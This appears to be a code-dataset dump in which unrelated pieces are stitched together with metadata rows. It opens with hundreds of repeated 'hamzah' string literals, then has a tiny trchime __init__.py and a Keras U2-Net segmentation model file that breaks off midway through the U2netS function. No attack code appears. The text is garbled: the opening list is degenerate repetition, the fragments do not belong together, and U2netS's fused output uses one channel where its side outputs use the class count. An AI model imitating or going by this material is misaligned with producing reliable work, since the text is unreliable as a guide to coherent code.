"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
)
| 26.108558 | 16,876 | 0.653954 | 40,608 | 392,020 | 6.313091 | 0.01219 | 1.872352 | 2.808388 | 3.74433 | 0.936843 | 0.936714 | 0.936445 | 0.936445 | 0.936352 | 0.936352 | 0 | 0.007377 | 0.038345 | 392,020 | 15,014 | 16,877 | 26.110297 | 0.67265 | 0.00024 | 0 | 0.9996 | 0 | 0.0001 | 0.655372 | 0.043004 | 0 | 1 | 0 | 0 | 0 | 0 | null | null | 0 | 0.0001 | null | null | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | null | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 14 |
3ae7bbc764db6853d77ca25ea24133266894b78e | 99 | py | Python | trchime/datasets/__init__.py | yatorho/trchime | 503acd1309b6c2e44c1a270266f4479bdcfdd804 | [
"Apache-2.0"
] | null | null | null | trchime/datasets/__init__.py | yatorho/trchime | 503acd1309b6c2e44c1a270266f4479bdcfdd804 | [
"Apache-2.0"
] | null | null | null | trchime/datasets/__init__.py | yatorho/trchime | 503acd1309b6c2e44c1a270266f4479bdcfdd804 | [
"Apache-2.0"
] | null | null | null | from .data_sets import mnist_set
from .data_sets import cifar_set
from .data_sets import faces_set
| 24.75 | 32 | 0.848485 | 18 | 99 | 4.333333 | 0.444444 | 0.307692 | 0.461538 | 0.692308 | 0.538462 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.121212 | 99 | 3 | 33 | 33 | 0.896552 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
3af734e2f727ba0744f8f208cbc600502ba917a9 | 17,462 | py | Python | models/u2net.py | sxlyiyiyi/HuBMAP---Hacking-the-Kidney_Baseline | 757a356387907923a5ce468953b6c5dd1217cad3 | [
"Apache-2.0"
] | null | null | null | models/u2net.py | sxlyiyiyi/HuBMAP---Hacking-the-Kidney_Baseline | 757a356387907923a5ce468953b6c5dd1217cad3 | [
"Apache-2.0"
] | null | null | null | models/u2net.py | sxlyiyiyi/HuBMAP---Hacking-the-Kidney_Baseline | 757a356387907923a5ce468953b6c5dd1217cad3 | [
"Apache-2.0"
] | 2 | 2020-12-21T20:55:56.000Z | 2020-12-31T03:25:46.000Z | import tensorflow as tf
from tensorflow.keras.layers import Conv2D, BatchNormalization, ReLU, add, Activation
from tensorflow.keras.layers import MaxPool2D, concatenate, UpSampling2D, Input, Dropout
from tensorflow.keras.models import Model
def conv_block(inputs, filters, kernel_size=3, strides=1, dirate=1, padding='same'):
x = Conv2D(filters, kernel_size, strides=strides, padding=padding, use_bias=False, dilation_rate=(dirate, dirate))(
inputs)
x = BatchNormalization(axis=-1)(x)
# A = PReLU(shared_axes=[1, 2])(Z)
x = ReLU()(x)
return x
def RSU7(inputs, out_filters=3, mid_filters=12):
hxin = conv_block(inputs, out_filters)
hx1 = conv_block(hxin, mid_filters)
hx = MaxPool2D(pool_size=(2, 2))(hx1)
hx2 = conv_block(hx, mid_filters)
hx = MaxPool2D(pool_size=(2, 2))(hx2)
hx3 = conv_block(hx, mid_filters)
hx = MaxPool2D(pool_size=(2, 2))(hx3)
hx4 = conv_block(hx, mid_filters)
hx = MaxPool2D(pool_size=(2, 2))(hx4)
hx5 = conv_block(hx, mid_filters)
hx = MaxPool2D(pool_size=(2, 2))(hx5)
hx6 = conv_block(hx, mid_filters)
hx7 = conv_block(hx6, mid_filters)
hx6d = concatenate([hx6, hx7])
hx6d = conv_block(hx6d, mid_filters)
hx6dup = tf.compat.v1.image.resize_bilinear(hx6d, (tf.shape(hx5)[1], tf.shape(hx5)[2]), True)
hx5d = concatenate([hx6dup, hx5])
hx5d = conv_block(hx5d, mid_filters)
hx5dup = tf.compat.v1.image.resize_bilinear(hx5d, (tf.shape(hx4)[1], tf.shape(hx4)[2]), True)
hx4d = concatenate([hx5dup, hx4])
hx4d = conv_block(hx4d, mid_filters)
hx4dup = tf.compat.v1.image.resize_bilinear(hx4d, (tf.shape(hx3)[1], tf.shape(hx3)[2]), True)
hx3d = concatenate([hx4dup, hx3])
hx3d = conv_block(hx3d, mid_filters)
hx3dup = tf.compat.v1.image.resize_bilinear(hx3d, (tf.shape(hx2)[1], tf.shape(hx2)[2]), True)
hx2d = concatenate([hx3dup, hx2])
hx2d = conv_block(hx2d, mid_filters)
hx2dup = tf.compat.v1.image.resize_bilinear(hx2d, (tf.shape(hx1)[1], tf.shape(hx1)[2]), True)
hx1d = concatenate([hx2dup, hx1])
hx1d = conv_block(hx1d, out_filters)
hxou = add([hxin, hx1d])
return hxou
def RSU6(inputs, out_filters=3, mid_filters=12):
hxin = conv_block(inputs, out_filters)
hx1 = conv_block(hxin, mid_filters)
hx = MaxPool2D(pool_size=(2, 2))(hx1)
hx2 = conv_block(hx, mid_filters)
hx = MaxPool2D(pool_size=(2, 2))(hx2)
hx3 = conv_block(hx, mid_filters)
hx = MaxPool2D(pool_size=(2, 2))(hx3)
hx4 = conv_block(hx, mid_filters)
hx = MaxPool2D(pool_size=(2, 2))(hx4)
hx5 = conv_block(hx, mid_filters)
hx6 = conv_block(hx5, mid_filters, dirate=2)
hx5d = concatenate([hx6, hx5])
hx5d = conv_block(hx5d, mid_filters)
hx5dup = tf.compat.v1.image.resize_bilinear(hx5d, (tf.shape(hx4)[1], tf.shape(hx4)[2]), True)
hx4d = concatenate([hx5dup, hx4])
hx4d = conv_block(hx4d, mid_filters)
hx4dup = tf.compat.v1.image.resize_bilinear(hx4d, (tf.shape(hx3)[1], tf.shape(hx3)[2]), True)
hx3d = concatenate([hx4dup, hx3])
hx3d = conv_block(hx3d, mid_filters)
hx3dup = tf.compat.v1.image.resize_bilinear(hx3d, (tf.shape(hx2)[1], tf.shape(hx2)[2]), True)
hx2d = concatenate([hx3dup, hx2])
hx2d = conv_block(hx2d, mid_filters)
hx2dup = tf.compat.v1.image.resize_bilinear(hx2d, (tf.shape(hx1)[1], tf.shape(hx1)[2]), True)
hx1d = concatenate([hx2dup, hx1])
hx1d = conv_block(hx1d, out_filters)
hxou = add([hxin, hx1d])
return hxou
def RSU5(inputs, out_filters=3, mid_filters=12):
hxin = conv_block(inputs, out_filters)
hx1 = conv_block(hxin, mid_filters)
hx = MaxPool2D(pool_size=(2, 2))(hx1)
hx2 = conv_block(hx, mid_filters)
hx = MaxPool2D(pool_size=(2, 2))(hx2)
hx3 = conv_block(hx, mid_filters)
hx = MaxPool2D(pool_size=(2, 2))(hx3)
hx4 = conv_block(hx, mid_filters)
hx5 = conv_block(hx4, mid_filters, dirate=2)
hx4d = concatenate([hx5, hx4])
hx4d = conv_block(hx4d, mid_filters)
hx4dup = tf.compat.v1.image.resize_bilinear(hx4d, (tf.shape(hx3)[1], tf.shape(hx3)[2]), True)
hx3d = concatenate([hx4dup, hx3])
hx3d = conv_block(hx3d, mid_filters)
hx3dup = tf.compat.v1.image.resize_bilinear(hx3d, (tf.shape(hx2)[1], tf.shape(hx2)[2]), True)
hx2d = concatenate([hx3dup, hx2])
hx2d = conv_block(hx2d, mid_filters)
hx2dup = tf.compat.v1.image.resize_bilinear(hx2d, (tf.shape(hx1)[1], tf.shape(hx1)[2]), True)
hx1d = concatenate([hx2dup, hx1])
hx1d = conv_block(hx1d, out_filters)
hxou = add([hxin, hx1d])
return hxou
def RSU4(inputs, out_filters=3, mid_filters=12):
hxin = conv_block(inputs, out_filters)
hx1 = conv_block(hxin, mid_filters)
hx = MaxPool2D(pool_size=(2, 2))(hx1)
hx2 = conv_block(hx, mid_filters)
hx = MaxPool2D(pool_size=(2, 2))(hx2)
hx3 = conv_block(hx, mid_filters)
hx4 = conv_block(hx3, mid_filters, dirate=2)
hx3d = concatenate([hx4, hx3])
hx3d = conv_block(hx3d, mid_filters)
hx3dup = tf.compat.v1.image.resize_bilinear(hx3d, (tf.shape(hx2)[1], tf.shape(hx2)[2]), True)
hx2d = concatenate([hx3dup, hx2])
hx2d = conv_block(hx2d, mid_filters)
hx2dup = tf.compat.v1.image.resize_bilinear(hx2d, (tf.shape(hx1)[1], tf.shape(hx1)[2]), True)
hx1d = concatenate([hx2dup, hx1])
hx1d = conv_block(hx1d, out_filters)
hxou = add([hxin, hx1d])
return hxou
def RSU4F(inputs, out_filters=3, mid_filters=12):
hxin = conv_block(inputs, out_filters) # shape=(None, 20, 20, 256)
hx1 = conv_block(hxin, mid_filters) # shape=(None, 20, 20, 512)
hx2 = conv_block(hx1, mid_filters, dirate=2) # shape=(None, 20, 20, 512)
hx3 = conv_block(hx2, mid_filters, dirate=4) # shape=(None, 20, 20, 512)
hx4 = conv_block(hx3, mid_filters, dirate=8) # shape=(None, 20, 20, 512)
hx3d = concatenate([hx4, hx3]) # shape=(None, 20, 20, 1024)
hx3d = conv_block(hx3d, mid_filters, dirate=4) # shape=(None, 20, 20, 512)
hx2d = concatenate([hx3d, hx2]) # shape=(None, 20, 20, 1024)
hx2d = conv_block(hx2d, mid_filters, dirate=2) # shape=(None, 20, 20, 512)
hx1d = concatenate([hx2d, hx1]) # shape=(None, 20, 20, 1024
hx1d = conv_block(hx1d, mid_filters, dirate=1) # shape=(None, 20, 20, 512)
hxou = add([hxin, hx1d])
return hxou
def U2net(input_shape=(320, 320, 3), classes=2, activation='softmax'):
inputs = Input(shape=input_shape)
hx1 = RSU7(inputs, 32, 64) # shape=(None, 320, 320, 32)
hx = MaxPool2D(pool_size=(2, 2))(hx1) # shape=(None, 160, 160, 32)
hx2 = RSU6(hx, 32, 128) # shape=(None, 160, 160, 32)
hx = MaxPool2D(pool_size=(2, 2))(hx2) # shape=(None, 80, 80, 32)
hx3 = RSU5(hx, 64, 256) # shape=(None, 80, 80, 64)
hx = MaxPool2D(pool_size=(2, 2))(hx3) # shape=(None, 40, 40, 64)
hx4 = RSU4(hx, 128, 512) # shape=(None, 40, 40, 128)
hx = MaxPool2D(pool_size=(2, 2))(hx4) # shape=(None, 20, 20, 128)
# ?
hx5 = RSU4F(hx, 256, 256) # shape=(None, 20, 20, 256)
hx = MaxPool2D(pool_size=(2, 2))(hx5) # shape=(None, 10, 10, 256
hx6 = RSU4F(hx, 512, 512) # shape=(None, 10, 10, 512)
hx6up = tf.compat.v1.image.resize_bilinear(hx6, (tf.shape(hx5)[1], tf.shape(hx5)[2]), True)
hx5d = concatenate([hx6up, hx5]) # shape=(None, 20, 20, 768)
hx5d = RSU4F(hx5d, 512, 512) # shape=(None, 20, 20, 512)
hx5up = tf.compat.v1.image.resize_bilinear(hx5d, (tf.shape(hx4)[1], tf.shape(hx4)[2]), True)
hx4d = concatenate([hx5up, hx4]) # shape=(None, 40, 40, 640)
hx4d = RSU4(hx4d, 128, 256) # shape=(None, 40, 40, 128)
hx4up = tf.compat.v1.image.resize_bilinear(hx4d, (tf.shape(hx3)[1], tf.shape(hx3)[2]), True)
hx3d = concatenate([hx4up, hx3]) # shape=(None, 80, 80, 192)
hx3d = RSU5(hx3d, 64, 128) # shape=(None, 80, 80, 64)
hx3up = tf.compat.v1.image.resize_bilinear(hx3d, (tf.shape(hx2)[1], tf.shape(hx2)[2]), True)
hx2d = concatenate([hx3up, hx2]) # shape=(None, 160, 160, 96)
hx2d = RSU6(hx2d, 32, 64) # shape=(None, 160, 160, 32)
hx2up = tf.compat.v1.image.resize_bilinear(hx2d, (tf.shape(hx1)[1], tf.shape(hx1)[2]), True)
hx1d = concatenate([hx2up, hx1]) # shape=(None, 320, 320, 64)
hx1d = RSU7(hx1d, 16, 64)
d1 = Conv2D(classes, kernel_size=3, activation=None, padding='same', use_bias=False)(hx1d)
d2 = Conv2D(classes, kernel_size=3, activation=None, padding='same', use_bias=False)(hx2d)
d2 = tf.compat.v1.image.resize_bilinear(d2, (tf.shape(hx1)[1], tf.shape(hx1)[2]), True)
d3 = Conv2D(classes, kernel_size=3, activation=None, padding='same', use_bias=False)(hx3d)
d3 = tf.compat.v1.image.resize_bilinear(d3, (tf.shape(hx1)[1], tf.shape(hx1)[2]), True)
d4 = Conv2D(classes, kernel_size=3, activation=None, padding='same', use_bias=False)(hx4d)
d4 = tf.compat.v1.image.resize_bilinear(d4, (tf.shape(hx1)[1], tf.shape(hx1)[2]), True)
d5 = Conv2D(classes, kernel_size=3, activation=None, padding='same', use_bias=False)(hx5d)
d5 = tf.compat.v1.image.resize_bilinear(d5, (tf.shape(hx1)[1], tf.shape(hx1)[2]), True)
d = concatenate([d1, d2, d3, d4, d5])
d = Conv2D(classes, kernel_size=3, activation=None, padding='same', use_bias=False)(d)
if activation in {'softmax', 'sigmoid'}:
d = Activation(activation, name='d')(d)
d1 = Activation(activation, name='d1')(d1)
d2 = Activation(activation, name='d2')(d2)
d3 = Activation(activation, name='d3')(d3)
d4 = Activation(activation, name='d4')(d4)
d5 = Activation(activation, name='d5')(d5)
'''
Total params: 94,339,965
Trainable params: 94,295,229
Non-trainable params: 44,736
'''
model = Model(inputs=inputs, outputs=[d, d1, d2, d3, d4, d5])
return model
def U2netS(input_shape=(320, 320, 3), classes=2, drop_rate=0.35, activation='softmax'):
inputs = Input(shape=input_shape)
hx1 = RSU7(inputs, 16, 64) # shape=(None, 320, 320, 16)
hx = MaxPool2D(pool_size=(2, 2))(hx1)
if drop_rate > 0.:
hx = Dropout(drop_rate)(hx)
hx2 = RSU6(hx, 16, 64) # shape=(None, 160, 160, 16)
hx = MaxPool2D(pool_size=(2, 2))(hx2)
if drop_rate > 0.:
hx = Dropout(drop_rate)(hx)
hx3 = RSU5(hx, 16, 64) # shape=(None, 80, 80, 16)
hx = MaxPool2D(pool_size=(2, 2))(hx3) # shape=(None, 40, 40, 16)
if drop_rate > 0.:
hx = Dropout(drop_rate)(hx)
hx4 = RSU4(hx, 16, 64) # shape=(None, 40, 40, 16)
hx = MaxPool2D(pool_size=(2, 2))(hx4)
hx5 = RSU4F(hx, 16, 16) # shape=(None, 20, 20, 16)
hx = MaxPool2D(pool_size=(2, 2))(hx5) # shape=(None, 10, 10, 16
if drop_rate > 0.:
hx = Dropout(drop_rate)(hx)
hx6 = RSU4F(hx, 16, 16) # shape=(None, 10, 10, 16)
hx6up = tf.compat.v1.image.resize_bilinear(hx6, (tf.shape(hx5)[1], tf.shape(hx5)[2]), True)
hx5d = concatenate([hx6up, hx5])
hx5d = RSU4F(hx5d, 16, 16)
hx5up = tf.compat.v1.image.resize_bilinear(hx5d, (tf.shape(hx4)[1], tf.shape(hx4)[2]), True)
hx4d = concatenate([hx5up, hx4])
# if drop_rate>0.:
# hx4d=Dropout(drop_rate)(hx4d)
hx4d = RSU4(hx4d, 16, 64)
hx4up = tf.compat.v1.image.resize_bilinear(hx4d, (tf.shape(hx3)[1], tf.shape(hx3)[2]), True)
hx3d = concatenate([hx4up, hx3])
hx3d = RSU5(hx3d, 16, 64)
hx3up = tf.compat.v1.image.resize_bilinear(hx3d, (tf.shape(hx2)[1], tf.shape(hx2)[2]), True)
hx2d = concatenate([hx3up, hx2])
# if drop_rate>0.:
# hx2d=Dropout(drop_rate)(hx2d)
hx2d = RSU6(hx2d, 16, 64)
hx2up = tf.compat.v1.image.resize_bilinear(hx2d, (tf.shape(hx1)[1], tf.shape(hx1)[2]), True)
hx1d = concatenate([hx2up, hx1])
# if drop_rate>0.:
# hx1d=Dropout(drop_rate)(hx1d)
hx1d = RSU7(hx1d, 16, 64)
d1 = Conv2D(classes, kernel_size=3, activation=None, padding='same', use_bias=False)(hx1d)
d2 = Conv2D(classes, kernel_size=3, activation=None, padding='same', use_bias=False)(hx2d)
d2 = tf.compat.v1.image.resize_bilinear(d2, (tf.shape(hx1)[1], tf.shape(hx1)[2]), True)
d3 = Conv2D(classes, kernel_size=3, activation=None, padding='same', use_bias=False)(
hx3d) # shape=(None, 80, 80, 1)
d3 = tf.compat.v1.image.resize_bilinear(d3, (tf.shape(hx1)[1], tf.shape(hx1)[2]), True)
d4 = Conv2D(classes, kernel_size=3, activation=None, padding='same', use_bias=False)(
hx4d) # shape=(None, 40, 40, 1)
d4 = tf.compat.v1.image.resize_bilinear(d4, (tf.shape(hx1)[1], tf.shape(hx1)[2]), True)
d5 = Conv2D(classes, kernel_size=3, activation=None, padding='same', use_bias=False)(
hx5d) # shape=(None, 20, 20, 1)
d5 = tf.compat.v1.image.resize_bilinear(d5, (tf.shape(hx1)[1], tf.shape(hx1)[2]), True)
d = concatenate([d1, d2, d3, d4, d5])
d = Conv2D(1, kernel_size=3, activation=None, padding='same', use_bias=False)(d)
if activation in {'softmax', 'sigmoid'}:
d = Activation(activation, name='d')(d)
d1 = Activation(activation, name='d1')(d1)
d2 = Activation(activation, name='d2')(d2)
d3 = Activation(activation, name='d3')(d3)
d4 = Activation(activation, name='d4')(d4)
